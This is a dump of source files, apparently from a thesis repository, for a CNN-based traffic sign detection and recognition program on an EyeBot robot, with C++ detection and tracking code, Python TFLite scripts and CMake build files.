0;\n \n //use iterator here instead\n for (Point2f p : points) {\n int x = (int) p.x;\n int y = (int) p.y;\n if( (i<x&&x<i+WINDOW_SIZE)&&(j<y&&y<j+WINDOW_SIZE)) density++;\n }\n if(density>THRESHOLD ) {\n ROI temp = ROI(i,j,WINDOW_SIZE,WINDOW_SIZE,density);\n rois.push_front(temp);\n }\n \n }\n }\n \n rois.sort(my_compare);\n \n KeyPoint::convert(keypoints, points, keypoint_indexes);\n \n \n\n LCDImage(rgb);\n \n \n \n /*\n std::vector<uchar> 
tmp_array(SIZE);\n tmp_array.assign(image_keypoints.data, image_keypoints.data + 3*image_keypoints.total());\n BYTE* img = &tmp_array[0];\n \n LCDImage(img);\n */\n \n return;\n}\n\nvoid showROIs(list<ROI>& rois) {\n list<ROI>::iterator it;\n for (it = rois.begin(); it != rois.end(); it++) {\n int x = it->x;\n int y = it->y;\n int xs = it->xs;\n int ys = it->ys;\n LCDArea(x,y,x+xs,y+ys,GREEN,0);\n }\n return;\n}\n\nvoid TSD_reporting(float td) {\n //printf(\"FPS: %f\\n\", 1/td);\n \n LCDSetPrintf(0,52, \"FPS (actual): %f\\n\", 1/td);\n LCDSetPrintf(1,52, \"FPS (limit): %d\\n\", FREQ1);\n \n}\n\nvoid NMSuppression(list<ROI>& rois) {\n /*\n 1. Get highest priority ROI\n 2. Remove all ROIs with high overlap to highest priority ROI\n 3. Repeat with next highest ROI until reach the end of the list\n note: list is already sorted by priority\n */\n \n static const float OVERLAP_THRESHOLD = 0.10; // was 0.05\n list<ROI>::iterator it1;\n for (it1 = rois.begin(); it1 != rois.end(); it1++) {\n list<ROI>::iterator it2;\n \n int area = (it1->xs)*(it1->ys);\n for (it2 = next(it1); it2 != rois.end(); it2++) {\n int x_overlap = max(0, min(it1->x+it1->xs, it2->x+it2->xs) - max(it1->x, it2->x));\n int y_overlap = max(0, min(it1->y+it1->ys, it2->y+it2->ys) - max(it1->y, it2->y));\n int overlapArea = x_overlap * y_overlap;\n \n if(overlapArea > OVERLAP_THRESHOLD*area) {\n it2 = rois.erase(it2);\n it2--;\n }\n }\n }\n return;\n}\n\nvoid trackDetections(list<ROI>& rois, list<Detection>& detections) {\n /*\n compare with existing detections and delete ROIs that have been classified before?\n */\n \n const static int DISTANCE_THRESHOLD = 35;\n list<Detection>::iterator it1;\n for (it1=detections.begin(); it1!=detections.end();it1++) {\n list<ROI>::iterator it2;\n for(it2=rois.begin();it2!=rois.end();it2++) {\n int it1_xc = it1->x + it1->xs/2;\n int it1_yc = it1->y + it1->ys/2;\n int it2_xc = it2->x + it2->xs/2;\n int it2_yc = it2->y + it2->ys/2;\n \n int dx = abs(it1_xc-it2_xc);\n int dy = abs(it1_yc-it2_yc);\n \n int dist = sqrt(dx*dx+dy*dy);\n \n //printf(\"dist = %d\\n\", dist);\n \n if(dist < DISTANCE_THRESHOLD) {\n // update location of detection\n \n const static int SIZE_OF_CLASSIFIER = 128;\n /*\n if(it2_xc-SIZE_OF_CLASSIFIER/2<0) it1.update_horizontals(0,SIZE_OF_CLASSIFIER);\n else if(x_c+SIZE_OF_CLASSIFIER/2>WIDTH) x_c = WIDTH-SIZE_OF_CLASSIFIER/2;\n if(y_c-SIZE_OF_CLASSIFIER/2<0) y_c = SIZE_OF_CLASSIFIER/2;\n else if(y_c+SIZE_OF_CLASSIFIER/2>HEIGHT) y_c = HEIGHT-SIZE_OF_CLASSIFIER/2;\n */\n if(it2_xc-SIZE_OF_CLASSIFIER/2<0) {\n it1->update_horizontals(0,SIZE_OF_CLASSIFIER);\n } else if(it2_xc+SIZE_OF_CLASSIFIER/2>WIDTH) {\n it1->update_horizontals(WIDTH-SIZE_OF_CLASSIFIER, SIZE_OF_CLASSIFIER);\n } else {\n it1->update_horizontals(it2_xc-SIZE_OF_CLASSIFIER/2,SIZE_OF_CLASSIFIER);\n }\n \n if(it2_yc-SIZE_OF_CLASSIFIER/2<0) {\n it1->update_verticals(0,SIZE_OF_CLASSIFIER);\n } else if(it2_yc+SIZE_OF_CLASSIFIER/2>HEIGHT) {\n it1->update_verticals(HEIGHT-SIZE_OF_CLASSIFIER, SIZE_OF_CLASSIFIER);\n } else {\n it1->update_verticals(it2_yc-SIZE_OF_CLASSIFIER/2,SIZE_OF_CLASSIFIER);\n }\n\n \n rois.erase(it2);\n break;\n }\n }\n \n // if it has reached this point, it cannot be tracked\n if(it2==rois.end()) {\n it1 = detections.erase(it1);\n it1--;\n }\n \n }\n return;\n}\n\nvoid show_detections(list<Detection>& detections) {\n list<Detection>::iterator it1;\n for (it1=detections.begin(); it1!=detections.end();it1++) {\n if(it1->object_class==0) continue;\n \n const static float X_M= 0.18;\n const static float X_C= 
-2.3;\n const static float Y_M= 0.06;\n const static float Y_C= 1.4;\n \n\n LCDArea(it1->x,it1->y,it1->x+it1->xs-1,it1->y+it1->ys-1,YELLOW,0);\n LCDSetPos(Y_M*it1->y+Y_C,X_M*it1->x+X_C);\n LCDPrintf(\"%s:%f\",labels[it1->object_class].c_str(),it1->confidence);\n }\n \n return;\n}\n\n\nvoid classification(list<ROI>& rois, list<Detection>& detections) {\n \n int index;\n double confidence;\n \n if(rois.empty()) return;\n ROI *roi = &rois.front();\n int x_c = roi->x + (roi->xs)/2;\n int y_c = roi->y + (roi->ys)/2;\n \n const static int SIZE_OF_CLASSIFIER = 128;\n x_c = min(WIDTH-SIZE_OF_CLASSIFIER/2,max(SIZE_OF_CLASSIFIER/2,x_c));\n y_c = min(HEIGHT-SIZE_OF_CLASSIFIER/2,max(SIZE_OF_CLASSIFIER/2,y_c));\n \n LCDArea(x_c-SIZE_OF_CLASSIFIER/2,y_c-SIZE_OF_CLASSIFIER/2,x_c+SIZE_OF_CLASSIFIER/2-1,y_c+SIZE_OF_CLASSIFIER/2-1,RED,0);\n \n \n Mat image = cv::Mat(HEIGHT,WIDTH, CV_8UC3, rgb);\n //Rect highest_priority(roi->x,roi->y,roi->xs,roi->ys);\n //Rect highest_priority(x_c - SIZE_OF_CLASSIFIER/2,y_c - SIZE_OF_CLASSIFIER/2 ,SIZE_OF_CLASSIFIER,SIZE_OF_CLASSIFIER);\n Rect highest_priority(x_c - SIZE_OF_CLASSIFIER/2,y_c - SIZE_OF_CLASSIFIER/2 ,SIZE_OF_CLASSIFIER,SIZE_OF_CLASSIFIER);\n cvtColor(image, image,CV_RGB2BGR);\n Mat tmp = image(highest_priority);\n Mat cropped;\n tmp.copyTo(cropped); // not using pointers\n \n \n \n \n \n //image.copyTo(cropped,highest_priority);\n\n /*\n namedWindow( \"Display window\", WINDOW_AUTOSIZE );\n imshow( \"Display window\", cropped );\n waitKey(0);\n */\n \n PyObject *pArgs = PyTuple_New(3);\n char *img_data = (char *)cropped.data;\n int len = SIZE_OF_CLASSIFIER*SIZE_OF_CLASSIFIER*3;\n PyObject *pValue1 = PyMemoryView_FromMemory(img_data,len,PyBUF_READ);\n if (!pValue1) {\n //printf(\"1\\n\");\n Py_XDECREF(pValue1);\n Py_DECREF(pArgs);\n Py_DECREF(pModule);\n fprintf(stderr, \"Cannot convert argument\\n\");\n return;\n }\n \n \n //printf(\"2\\n\");\n PyTuple_SetItem(pArgs, 0, pValue1);\n PyTuple_SetItem(pArgs, 1, PyLong_FromLong(128)); // set height\n PyTuple_SetItem(pArgs, 2, PyLong_FromLong(128)); // set width\n //printf(\"2.1\\n\");\n \n PyObject *pValue2 = PyObject_CallObject(pFunc, pArgs);\n //printf(\"here1\\n\");\n //printf(\"2.2\\n\");\n //Py_DECREF(pValue1);\n //Py_DECREF(pArgs);\n //printf(\"2.3\\n\");\n if (pValue2 != NULL) {\n //printf(\"3\\n\");\n //PyObject *pResult1 = PyTuple_GetItem(pValue2,0);\n //index = (uint) PyLong_AsLong(pResult1);\n //index = int (PyLong_AsLong(pResult1));\n index = int (PyLong_AsLong(PyTuple_GetItem(pValue2,0)));\n //printf(\"index=%i\",index);\n //PyObject *pResult2 = PyTuple_GetItem(pValue2,1);\n //confidence = PyFloat_AsDouble(pResult2);\n confidence =PyFloat_AsDouble(PyTuple_GetItem(pValue2,1));\n \n //printf(\"index = %i, confidence = %f\\n\", index, confidence);\n \n \n // fault is here\n //Py_XDECREF(pResult1);\n //Py_XDECREF(pResult2);\n Py_XDECREF(pValue2);\n }\n else {\n //printf(\"4\\n\");\n Py_XDECREF(pValue2);\n PyErr_Print();\n fprintf(stderr,\"Call failed\\n\");\n return;\n }\n \n \n \n //printf(\"5\\n\");\n \n Detection observed(index, confidence,x_c-SIZE_OF_CLASSIFIER/2,y_c-SIZE_OF_CLASSIFIER/2,SIZE_OF_CLASSIFIER,SIZE_OF_CLASSIFIER );\n \n //printf(\"6\\n\");\n \n detections.push_back(observed);\n //printf(\"\\nlabel: %s, confidence: %f\\n\", labels[index].c_str(), confidence);\n \n \n int train = 0;\n if(train==1) {\n char filename [50];\n snprintf(filename,50,\"images/%s/%s_%04d.jpg\", labels[index].c_str(), sessionID, num);\n std::string str(filename);\n //str = \"crossing/\" + EXTENSION;\n num++;\n \n 
imwrite(filename,cropped);\n \n }\n \n return;\n}\n\nvoid read_labels() {\n ifstream f;\n f.open(\"tf_files/labels.txt\");\n while(!f.eof()) {\n string s;\n getline(f,s);\n labels.push_back(s);\n //printf(\"%s\\n\", s.c_str());\n }\n f.close();\n return;\n}\n\nvoid traffic_sign_detection() {\n // to monitor CPU consumption\n static high_resolution_clock::time_point t1;\n t1 = high_resolution_clock::now();\n \n list<ROI> _ROIs;\n static list<Detection> detections;\n \n detectROIs(_ROIs);\n \n NMSuppression(_ROIs);\n //showROIs(_ROIs);\n trackDetections(_ROIs, detections);\n showROIs(_ROIs);\n classification(_ROIs, detections);\n \n show_detections(detections);\n \n //LCDImage(rgb);\n \n \n /*\n 1. detect ROIs (input: rgb image; output: list of ROIs\n 2. supress non-maximal ROIs\n 3. track existant detections\n 4. choose highest-priority ROI to classify\n 5. perform classification and return new detection\n 6. display detections\n */\n \n //printf(\"\\nHello, World!\\n\");\n \n static high_resolution_clock::time_point t2;\n t2 = high_resolution_clock::now();\n static float td;\n td = (duration_cast<duration<double> >(t2-t1)).count();\n \n \n //printf(\"number of detections: %d\\n\", detections.size());\n \n TSD_reporting(td);\n}\n\nint main ()\n{\n LCDSetPrintf(0,0, \"[PLEASE WAIT]\");\n char *app_name = (char *)\"EyeBot Traffic Sign Recognition and Detection\";\n Py_SetProgramName((wchar_t*)app_name);\n Py_Initialize();\n \n PyRun_SimpleString(\"import sys\");\n PyRun_SimpleString(\"sys.path.append(\\\"./scripts/\\\")\");\n \n PyObject *pName = PyUnicode_FromString(\"label\");\n pModule = PyImport_Import(pName);\n Py_DECREF(pName);\n \n if(pModule==NULL) {\n PyErr_Print();\n Py_DECREF(pModule);\n return -1;\n }\n \n \n pFunc = PyObject_GetAttrString(pModule, \"label\");\n if(!pFunc || !PyCallable_Check(pFunc)) {\n if (PyErr_Occurred()) PyErr_Print();\n Py_XDECREF(pFunc);\n Py_DECREF(pModule);\n return -1;\n }\n \n read_labels();\n //generateSessionID();\n \n printf(\"ALL GOOD AND LOADED! \\n\\n\\n\\n\\n\");\n \n \n CAMInit(RESOLUTION);\n LCDMenu(\"\",\"\",\"\",\"END\");\n \n while(1) {\n static high_resolution_clock::time_point tc;\n tc = high_resolution_clock::now();\n \n CAMGet(rgb);\n \n \n /* non-interupt timer 1 */\n static high_resolution_clock::time_point t1 = high_resolution_clock::now();\n static float td_1;\n td_1 = (duration_cast<duration<double> >(tc-t1)).count();\n if( 1000/FREQ1 < 1000*td_1) {\n traffic_sign_detection();\n t1 = high_resolution_clock::now();\n }\n \n /* io */\n static int key;\n key = KEYRead();\n if(key == KEY4) break;\n \n OSWait(100);\n }\n \n //Py_XDECREF(pFunc);\n //Py_DECREF(pModule);\n \n /*\n if (Py_FinalizeEx() < 0) {\n return 1;\n }\n */\n \n CAMRelease();\n return 0;\n}\n" }, { "alpha_fraction": 0.6712328791618347, "alphanum_fraction": 0.7114449739456177, "avg_line_length": 44.2599983215332, "blob_id": "7a0e6775a2b4abb608e7ee4cc3110aeb8e02bc25", "content_id": "a320061c45ee0043c713df968060fe1f2f6c1945", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2263, "license_type": "no_license", "max_line_length": 174, "num_lines": 50, "path": "/LEGACY/fromRobot/ORB_DETECTION-build/scripts/init.py", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "import sys\n\n# this is to ensure that everything will be able to work for MAC\n# note for future reference if google.protobuf issue: the __init__.py file is missing in site-packages/google directory. 
creating an empty __init__.py file there should work\n\nsys.path.append(\"/usr/local/Cellar/python@2/2.7.16/Frameworks/Python.framework/Versions/2.7/lib/python27.zip\")\nsys.path.append(\"/usr/local/Cellar/python@2/2.7.16/Frameworks/Python.framework/Versions/2.7/lib/python2.7\")\nsys.path.append(\"/usr/local/Cellar/python@2/2.7.16/Frameworks/Python.framework/Versions/2.7/lib/python2.7/plat-darwin\")\nsys.path.append(\"/usr/local/Cellar/python@2/2.7.16/Frameworks/Python.framework/Versions/2.7/lib/python2.7/plat-mac\")\nsys.path.append(\"/usr/local/Cellar/python@2/2.7.16/Frameworks/Python.framework/Versions/2.7/lib/python2.7/plat-mac/lib-scriptpackages\")\nsys.path.append(\"/usr/local/Cellar/python@2/2.7.16/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-tk\")\nsys.path.append(\"/usr/local/Cellar/python@2/2.7.16/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-old\")\nsys.path.append(\"/usr/local/Cellar/python@2/2.7.16/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload\")\nsys.path.append(\"/Users/Jordan/Library/Python/2.7/lib/python/site-packages\")\nsys.path.append(\"/usr/local/lib/python2.7/site-packages\")\nsys.path.append(\"/usr/local/Cellar/numpy/1.16.3/libexec/nose/lib/python2.7/site-packages\")\n\n\n# -----------------------------------\n# added\n# -----------------------------------\n\nimport numpy as np\nimport tensorflow as tf\nimport time\nimport cv2\n\ndef load_labels(label_file):\n label = []\n proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()\n for l in proto_as_ascii_lines:\n label.append(l.rstrip())\n return label\n\nif __name__ == '__main__':\n tf.enable_eager_execution()\n model_path = \"tf_files/graph.lite\"\n \n # Load TFLite model and allocate tensors.\n interpreter = tf.lite.Interpreter(model_path=model_path)\n interpreter.allocate_tensors()\n \n # Get input and output tensors.\n input_details = interpreter.get_input_details()\n output_details = interpreter.get_output_details()\n \n input_mean = 127.5\n input_std = 127.5\n\n labels = load_labels(\"tf_files/labels.txt\")\n" }, { "alpha_fraction": 0.7882353067398071, "alphanum_fraction": 0.8058823347091675, "avg_line_length": 33, "blob_id": "8e43c66dc3f2cf7e9c5ce4b4bbe780dc1ab7e5e4", "content_id": "90fe17485af39f847df900d7823ba2e6d49b670b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 340, "license_type": "no_license", "max_line_length": 78, "num_lines": 10, "path": "/README.md", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "# TrafficSigns\nMPE Thesis Project: CNN-based Traffic Sign Recognition with Detection\n\nUse TensorFlow binary from \nhttps://github.com/PINTO0309/Tensorflow-bin\nin order to ensure that the TF Lite module is functional on the Raspberry Pi. \n\nCode has been written for OpenCV3 and Tensorflow 2. 
\n\nI highly recommend Keras for training purposes.\n" }, { "alpha_fraction": 0.7516447305679321, "alphanum_fraction": 0.7680920958518982, "avg_line_length": 32.77777862548828, "blob_id": "57c8cb73d747b329cb18527e47f5e2ba9ceff1a6", "content_id": "6af59bbe86917d943ceea49a9769ffd6ee4c621f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 608, "license_type": "no_license", "max_line_length": 92, "num_lines": 18, "path": "/LEGACY/fromRobot/ORB_DETECTION-build/scripts/tflite_converter.py", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "import tensorflow as tf\n\ngraph_file = 'retrained_graph.pb'\ninput_array = [\"input\"]\noutput_array = [\"final_result\"]\n\nsess = tf.compat.v1.Session\n\nconverter = tf.lite.TFLiteConverter.from_frozen_graph(graph_file, input_array, output_array)\nconverter.inference_type = tf.float32\n\n#converter.inference_input_type = tf.float32#tf.uint8\n#converter.inference_output_type = tf.float32\n#converter.optimizations = [tf.compat.v1.lite.Optimize.OPTIMIZE_FOR_LATENCY]\n#converter.optimizations = [tf.compat.v1.lite.Optimize.DEFAULT]\n\ntflite_model = converter.convert()\nopen(\"tf_files/graph.lite\", \"wb\").write(tflite_model)\n" }, { "alpha_fraction": 0.786867618560791, "alphanum_fraction": 0.7876749038696289, "avg_line_length": 51.33802795410156, "blob_id": "11d50c3df3229600b50ef82441183b8a2df6e178", "content_id": "d77807bc7c25703b3c65458bb969097d4ba9531c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 3716, "license_type": "no_license", "max_line_length": 167, "num_lines": 71, "path": "/clusterbased-build/CMakeFiles/TrafficSignRecognition.dir/DependInfo.cmake", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "# The set of languages for which implicit dependencies are needed:\nset(CMAKE_DEPENDS_LANGUAGES\n \"CXX\"\n )\n# The set of files for implicit dependencies of each language:\nset(CMAKE_DEPENDS_CHECK_CXX\n \"/Users/Jordan/Desktop/Thesis/October/clusterbased/tsr.cpp\" \"/Users/Jordan/Desktop/Thesis/October/clusterbased-build/CMakeFiles/TrafficSignRecognition.dir/tsr.cpp.o\"\n )\nset(CMAKE_CXX_COMPILER_ID \"Clang\")\n\n# The include file search paths:\nset(CMAKE_CXX_TARGET_INCLUDE_PATH\n \"/Users/Jordan/opencv/build\"\n \"/Users/Jordan/opencv/opencv/include\"\n \"/Users/Jordan/opencv/opencv/modules/core/include\"\n \"/Users/Jordan/opencv/opencv/modules/flann/include\"\n \"/Users/Jordan/opencv/opencv/modules/imgproc/include\"\n \"/Users/Jordan/opencv/opencv/modules/ml/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/phase_unwrapping/include\"\n \"/Users/Jordan/opencv/opencv/modules/photo/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/plot/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/quality/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/reg/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/surface_matching/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/xphoto/include\"\n \"/Users/Jordan/opencv/opencv/modules/dnn/include\"\n \"/Users/Jordan/opencv/opencv/modules/features2d/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/freetype/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/fuzzy/include\"\n \"/Users/Jordan/opencv/opencv/modules/gapi/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/hfs/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/img_hash/include\"\n 
\"/Users/Jordan/opencv/opencv/modules/imgcodecs/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/line_descriptor/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/saliency/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/text/include\"\n \"/Users/Jordan/opencv/opencv/modules/videoio/include\"\n \"/Users/Jordan/opencv/opencv/modules/calib3d/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/datasets/include\"\n \"/Users/Jordan/opencv/opencv/modules/highgui/include\"\n \"/Users/Jordan/opencv/opencv/modules/objdetect/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/rgbd/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/shape/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/structured_light/include\"\n \"/Users/Jordan/opencv/opencv/modules/ts/include\"\n \"/Users/Jordan/opencv/opencv/modules/video/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/videostab/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/xfeatures2d/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/ximgproc/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/xobjdetect/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/aruco/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/bgsegm/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/bioinspired/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/ccalib/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/dnn_objdetect/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/dpm/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/face/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/optflow/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/sfm/include\"\n \"/Users/Jordan/opencv/opencv/modules/stitching/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/superres/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/tracking/include\"\n \"/Users/Jordan/opencv/opencv_contrib/modules/stereo/include\"\n )\n\n# Targets to which this target links.\nset(CMAKE_TARGET_LINKED_INFO_FILES\n )\n\n# Fortran module output directory.\nset(CMAKE_Fortran_TARGET_MODULE_DIR \"\")\n" }, { "alpha_fraction": 0.42041313648223877, "alphanum_fraction": 0.42041313648223877, "avg_line_length": 24.323076248168945, "blob_id": "509b9aea38436d014637a870e635d607c120829e", "content_id": "26de1d0740d1afd125e585516862bfff44029368", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1646, "license_type": "no_license", "max_line_length": 87, "num_lines": 65, "path": "/LEGACY/fromRobot/ORB_DETECTION/TSDR.cpp", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "namespace TSDR\n{\n class ROI {\n public:\n int x, y; // x, y coords of top left corner\n int xs, ys; // width, height respectively\n int priority;\n \n ROI (int x, int y, int xs, int ys) {\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = ys;\n }\n \n ROI (int x, int y, int xs, int ys, int priority) {\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = ys;\n this->priority = priority;\n }\n };\n \n class Detection {\n public:\n int object_class;\n double confidence;\n int x,y; // x,y coords of top left corner\n int xs,ys; // width, height respectively\n \n Detection (int object_class, double confidence, int x, int y, int xs, int ys) {\n this->object_class = object_class;\n this->confidence = confidence;\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = ys;\n }\n \n void setPosition(int x, int y) {\n 
this->x = x;\n this->y = y;\n }\n \n void update_horizontals(int x, int xs) {\n this->x = x;\n this->xs = xs;\n }\n \n void update_verticals(int y, int ys) {\n this->y = y;\n this->ys = ys;\n }\n \n void setDimensions(int xs, int ys) {\n this->xs = xs;\n this->ys = ys;\n }\n \n void updateConfidence (double confidence) {\n this->confidence = confidence;\n }\n };\n}\n" }, { "alpha_fraction": 0.7225000262260437, "alphanum_fraction": 0.7524999976158142, "avg_line_length": 87.88888549804688, "blob_id": "fbea24f9f3892b507c3f17965b89bda1b33287f2", "content_id": "3d35d72a1948d63ab4325e57c990dd9190884c4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 800, "license_type": "no_license", "max_line_length": 385, "num_lines": 9, "path": "/ROBOT COMPATIBILITY FILES/CMakeLists.txt", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "cmake_minimum_required(VERSION 2.8)\nset(OpenCV_DIR /usr/local/opt/opencv@2/share/OpenCV)\nproject( keypoints )\nfind_package( OpenCV REQUIRED )\ninclude_directories( ${OpenCV_INCLUDE_DIRS} /usr/local/include -I /usr/X11/include)\nLINK_DIRECTORIES (/usr/local/lib /usr/X11/lib /home/pi/eyebot/lib)\nset (CMAKE_CXX_FLAGS \"-L/usr/lib/python3.5/config-3.5m-arm-linux-gnueabihf -L/usr/lib -lpython3.5m -lpthread -ldl -lutil -lm -I/usr/include/python3.5m -I/usr/include/python3.5m -Xlinker -export-dynamic -Wl,-O1 -Wl,-Bsymbolic-functions -g -pedantic -Wall -lX11 -lpython2.7 -I/home/pi/eyebot/include -L/home/pi/eyebot/lib -lwiringPi -lX11 -pthread -llirc_client -lm -leyebot -lstdc++\")\nadd_executable( detector.demo detector.cpp TSDR.cpp)\ntarget_link_libraries( detector.demo ${OpenCV_LIBS} libeyebot.a)\n" }, { "alpha_fraction": 0.5888468623161316, "alphanum_fraction": 0.5964083075523376, "avg_line_length": 28.38888931274414, "blob_id": "b17a4355dc78fe075faa13ea0ea80db45970f410", "content_id": "dcd035a76ca405865caf4dd557cd4a3dd42a6aac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1058, "license_type": "no_license", "max_line_length": 103, "num_lines": 36, "path": "/clusterbased/version checking.cpp", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "#include <Python.h>\n#include <stdio.h>\n#include <opencv2/opencv.hpp>\nusing namespace cv;\nusing namespace std;\nint main(int argc, char** argv )\n{\n //PyRun_SimpleString(\"import sys\");\n char *app_name = (char *)\"SIFT-like Keypoint Cluster-based Traffic Sign Recognition and Detection\";\n Py_SetProgramName((wchar_t*)app_name);\n Py_Initialize();\n PyRun_SimpleString(\"import sys\");\n PyRun_SimpleString(\"print (sys.version)\");\n \n cout << \"OpenCV version : \" << CV_VERSION << endl;\n cout << \"Major version : \" << CV_MAJOR_VERSION << endl;\n cout << \"Minor version : \" << CV_MINOR_VERSION << endl;\n cout << \"Subminor version : \" << CV_SUBMINOR_VERSION << endl;\n \n if ( argc != 2 )\n {\n printf(\"usage: DisplayImage.out <Image_Path>\\n\");\n return -1;\n }\n Mat image;\n image = imread( argv[1], 1 );\n if ( !image.data )\n {\n printf(\"No image data \\n\");\n return -1;\n }\n namedWindow(\"Display Image\", WINDOW_AUTOSIZE );\n imshow(\"Display Image\", image);\n waitKey(0);\n return 0;\n}\n" }, { "alpha_fraction": 0.7545564770698547, "alphanum_fraction": 0.7825030088424683, "avg_line_length": 81.4000015258789, "blob_id": "ed6170950913f34a812918bd100eb022c944000b", "content_id": "5d7bb591e4da07ef865ecf7b019c22c293221176", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 823, "license_type": "no_license", "max_line_length": 444, "num_lines": 10, "path": "/clusterbased/CMakeLists.txt", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "cmake_minimum_required(VERSION 2.8)\nproject( TrafficSignRecognition )\n#SET(CMAKE_CXX_COMPILER /usr/bin/g++)\nset(OpenCV_DIR /Users/Jordan/opencv/build)\nfind_package( OpenCV REQUIRED )\ninclude_directories( ${OpenCV_INCLUDE_DIRS} )\nLINK_DIRECTORIES (/usr/local/lib)\nset (CMAKE_CXX_FLAGS \"-std=c++11 -I/usr/local/include -I/usr/X11/include -leyesim -I/Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m -I/Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m -fno-strict-aliasing -Wsign-compare -fno-common -dynamic -DNDEBUG -g -fwrapv -O3 -Wall -g -L/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/config-3.7m-darwin -lpython3.7m -ldl -framework CoreFoundation\")\nadd_executable( TrafficSignRecognition tsr.cpp )\ntarget_link_libraries( TrafficSignRecognition ${OpenCV_LIBS} )" }, { "alpha_fraction": 0.7162162065505981, "alphanum_fraction": 0.7207207083702087, "avg_line_length": 19.18181800842285, "blob_id": "e1fa03ae5d6e7cb9d695f62fcbc0122080371738", "content_id": "507d130d02ca540465f82170971141d1e4679c0e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 222, "license_type": "no_license", "max_line_length": 29, "num_lines": 11, "path": "/ROBOT COMPATIBILITY FILES/includes.cpp", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "#include <opencv2/opencv.hpp>\n#include \"eyebot++.h\"\n#include <Python.h>\n#include <string>\n#include <chrono>\n#include <stdio.h>\n#include <vector>\n#include <algorithm>\n#include <cmath>\n#include <iostream>\n#include <fstream>\n" } ]
18
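The classification script in the TrafficSigns record above stops right after the TFLite interpreter, its tensor details and the label list are loaded. A minimal sketch of the remaining inference step follows, using the standard `tf.lite.Interpreter` calls (`set_tensor` / `invoke` / `get_tensor`). Only the `tf_files/graph.lite` and `tf_files/labels.txt` paths and the 127.5 mean/std come from that record; the test image name, the BGR-to-RGB conversion and the NHWC float32 input layout are assumptions.

```python
import cv2
import numpy as np
import tensorflow as tf

# Load the converted model and labels the same way the record's script does.
interpreter = tf.lite.Interpreter(model_path="tf_files/graph.lite")
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
labels = [line.rstrip() for line in open("tf_files/labels.txt")]

# "example.jpg" is an assumed test image, not a file from the repository.
img = cv2.cvtColor(cv2.imread("example.jpg"), cv2.COLOR_BGR2RGB)
h, w = input_details[0]['shape'][1], input_details[0]['shape'][2]
img = (np.float32(cv2.resize(img, (w, h))) - 127.5) / 127.5   # input_mean / input_std

interpreter.set_tensor(input_details[0]['index'], np.expand_dims(img, axis=0))
interpreter.invoke()
scores = np.squeeze(interpreter.get_tensor(output_details[0]['index']))
print(labels[int(np.argmax(scores))], float(np.max(scores)))
```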
algoritmos-2019-2/clase-1-NancyEscamilla
https://github.com/algoritmos-2019-2/clase-1-NancyEscamilla
e7acc8844ea3ed46ef3541d288f33483f3e7d1b1
7af94c7a9888358311b86b8c11b610deaeb54b7f
9cf6fdce6229e1477ea78711e0833a58d3299b85
